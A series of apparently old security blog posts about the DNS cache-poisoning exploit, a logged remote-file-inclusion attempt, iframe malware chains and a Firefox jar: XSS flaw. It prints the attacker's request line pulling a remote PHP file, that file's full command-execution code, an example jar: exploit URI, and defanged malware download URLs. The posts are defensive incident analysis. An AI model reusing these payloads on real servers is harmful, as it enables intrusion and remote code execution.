exploit

From akeg on Flickr.

From VNUNET via Packetstorm:

H D Moore, who crafted the original DNS exploit module, said in a blog posting that an attacker managed to run the cache-poisoning attack on a server belonging to AT&T’s internet service in Austin, Texas.

As a result of the attack, servers at BreakingPoint Systems, the network security firm which employs Moore as director of security research, redirected employee machines from Google.com to a third-party site loaded with advertisements.

Apparently no real damage caused by it for them, but there must be loads of other users on AT&T’s DNS-servers.

I’m all for full disclosure but this is really affecting a lot of people. We are seeing a big increase in infected computers and the DNS flaw might be what’s behind this (but I have no concrete proof of it).

Anyhow, admins at larger ISP’s better get patching now if they haven’t started already.

Cheers,

From CNET:

On July 8, IOActive researcher Dan Kaminsky disclosed a flaw in the DNS but would not provide the details until all the affected vendors had released patches and all the systems worldwide could be patched. He figured that it would take about 30 days for that to happen.

The 30-day mark just happened to coincide with his speaking engagement at Black Hat in Las Vegas on August 6.

But on Monday, fellow Black Hat presenter Halvar Flake attacked Kaminsky’s plea that a security flaw such as this be kept a secret. Flake then proceeded to lay out what he thought the flaw was. Turns out, he was right and laid the foundation for others to create and publicize an exploit.

Other than what was linked in that article another exploit has also been added to the Packet storm exploit archive. Both of these are Metasploit modules and HD Moore (founder of the Metasploit project) is listed as one of the exploits authors.

Cheers and happy patching!

On the 11′th of December (04:17:52) I recieved the following request to this site:

“GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.asoc-posidonia.es/pr.txt?? HTTP/1.1″

Looks like someone is trying to exploit a RFI vulnerability in Pearl for Mambo. This particular issue was disclosed over a year ago and they are still scanning for it… Must be a lot of unpatched fish in the internet tubes…

The file that is supposed to be included is live and contains the following:

echo "549821347819481<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."<br>";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

The attacking host was:

80.237.200.81 (jam.seppenra.de)
Windows CE, Generic Gecko
Cologne, Germany,DE,50.9333,6.95
Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007

What about doing error checking verifying that the target contains vulnerable code? Doesn’t take much time and seems like a reasonable thing to do if you want to stay (at least a little bit) under the radar.

Anyhow, this gave me a good idea which I will present in a future post.

All involved system owners has been notified.

… and now have their pages full of malware infecting and object dumping <iframe>’s.

Tracking the iframe’s I found a series of different servers hosting the malware and exploits, the flow is as follows:

• hxxp://boc.sbb22.com/home/index.htm (This is the inserted Iframe)
  • hxxp://boc.sbb22.com/
    • hxxp://aa.llsging.com/ww/new82.htm
      • hxxp://aa.llsging.com/a2/haha.htm
      • hxxp://aa.llsging.com/a2/pps.htm
      • hxxp://js.users.51.la/1299644.js
        • hxxp://vip2.51.la/go.asp
      • hxxp://ww4.tongji123.com/g1.aspx?id=42916235
        • hxxp://ww4.tongji123.com/s.aspx
  • hxxp://nn.mm5208.com/nn.htm
    • Not reachable at the time
  • hxxp://xx.9365.org/
    • hxxp://5.xqhgm.com/sha1.htm
      • hxxp://5.xqhgm.com/new/1.gif (ANI exploit, loads on page).
        • Downloads and runs hxxp://1.xqhgm.com/x.exe
      • hxxp://5.xqhgm.com/new/1.htm (other exploit, not investigated)
        • References hxxp://1.xqhgm.com/x.exe
      • hxxp://5.xqhgm.com/new/2.htm
        • Not reachable at the time
      • hxxp://5.xqhgm.com/new/3.htm
        • Returns empty page
      • hxxp://5.xqhgm.com/new/4.htm
        • Tries to load hxxp://3.xqhgm.com/zs.exe as an object
      • hxxp://s30.cnzz.com/stat.php?id=658703&web_id=658703
        • Seems to be a statistics engine
      • hxxp://js.users.51.la/1402795.js
        • Not reachable at the time
  • hxxp://a.2008yi.com/hu.htm
    • Not reachable at the time
  • hxxp://acc.jqxx.org/ac.htm
    • hxxp://dfs.jfkdlirjnfirpocr.com/web/6619038.htm
      • Not reachable at the time

The primary payload of these iframed pages seems to be “x.exe” and “zs.exe”. When dumping the strings from these executables (no obfuscation used) it becomes apparent that both are droppers for a whole bunch of malware files (possibly the same files, just recompiled/packed/encrypted for AV evasion). The downloads referenced in the files were:

• hxxp://1.xqhgm.com/1.exe
• hxxp://1.xqhgm.com/2.exe
• hxxp://1.xqhgm.com/3.exe
• hxxp://1.xqhgm.com/4.exe
• and so on up to…
• hxxp://1.xqhgm.com/24.exe

File number “1″ and “16″ resulted in a 404 not found.

“23.exe” seems to be the same malware that I found some time back (see this post). As said in that post, the main infector do not want to run in my sandbox. As a cause of that I have not yet been able to get the pcihdd.sys rootkit component as I do not have a computer to “waste time restoring” atm. If someone would like to infect themselves, contact me for a sample

Another thing linking this infection to the other that I found is the use of the same stats engine, hxxp://s30.cnzz.com/.

Cheers and stay safe !

For those of you that has not been following the computer security news and blogs there is a new vulnerability in town, and it’s nasty.

The problem lies in the jar: protocol implementation used by Firefox and it enables an attacker to conduct XSS and gives them almost limitless possibilitys for malware hosting.

This is an example URI which exploits the issue:

jar:http://www.icmpecho.com/myjarshrine/yarihooo.jpg!/malwareloadingscript.html

Now, instead of copying others work which they have probably spent hours or more on to explain the issue in full, I’ll give you a short recap of the happenings and more and more exposing blog posts:

---

2007-02-08 - Jesse Ruderman logs the bug in the Mozilla bugzilla tracker. It remains unpatched and not widely known until…2007-11-07 - Researcher pdp discusses the issue and potential impact at GNUCitizen. This opens this bug up to a whole new audience and…2007-11-10 - Beford illustrates the seriousness of this issue and issues in the same family by targeting Google and Gmail and posts a new bug entry.2007-11-10 - And then Mario posts at GNUCitizen about other attack vectors including malware- and exploit-hosting.

---

During these last days we have also seen some very strange recommendations from leading scurity experts at ZDNet, Secunia and US Cert (and one at The register as well) as the most excellent Giorgio over at the Hackademix blog.

The problems with the recommendations given by these persons and/or organisations is mainly that the recommend blocking URI’s containing JAR: in webfilters and deep packet inspecting firewalls or avoid following “jar:” links.You should understand why this would be a total waste of time if you have read the above articles and in particular Giorgio’s comments on the issue.

Also you should know why if you have seen one page load another like in most web based exploits (Including the one on the Swedish Parliament’s websites this week (swedish link, sorry)). My feeling is that the first advisories were rushed out “to be first in the corporate sector” and sloppy research took its toll.

If you do want to protect yourselves for real, you might wanna download and install the NoScript extension to Firefox which also handles JAR.

Happy times!

Was doing some digging in google a couple of days back and found an iframe which led to a site distributing a downloader:

hxxp://w.mh8888.cn/ad.htm?a

This page in turn loads almost 10 pages and scripts from different servers, including one that uses a vulnerability in Internet Explorer to download and install a downloader (it hooks it into Internet Explorer as a BHO). If I did not use a vulnerable browser, nothing happened. Many links inside the scripts relate to the domain “cnzz.com”. Anyone have more info about these guys?

Anyhow, the dropper file’s name was “get.exe” and that in turn downloaded another file called “det.exe” which was placed in C:\Program files\Internet Explorer\det.exe.

When this file was run by get.exe (btw, it would not run in my sandbox:/ ), it started downloading and installing a driver called pcihdd.sys, placing it in c:\windows\system32\drivers\ and making the required system modifications to run. It also modified the file c:\windows\system32\userinit.exe. At the time of detection I only got a handful of “related to”, “modification of” or “suspicious file” responses from http://www.virustotal.com.

The .js’s responsible for the infections was obfuscated by simple encoding routines and then run through eval() statements. The binaries themselves had obfuscated only some of their internal strings, but some were left unchanged. One of those strings was a link to an asian site (hxxp://ilove.com/ttt.cer) disguised as a dating site.

All files including the scripts collected has been reported to the AV vendors now and should be included by now.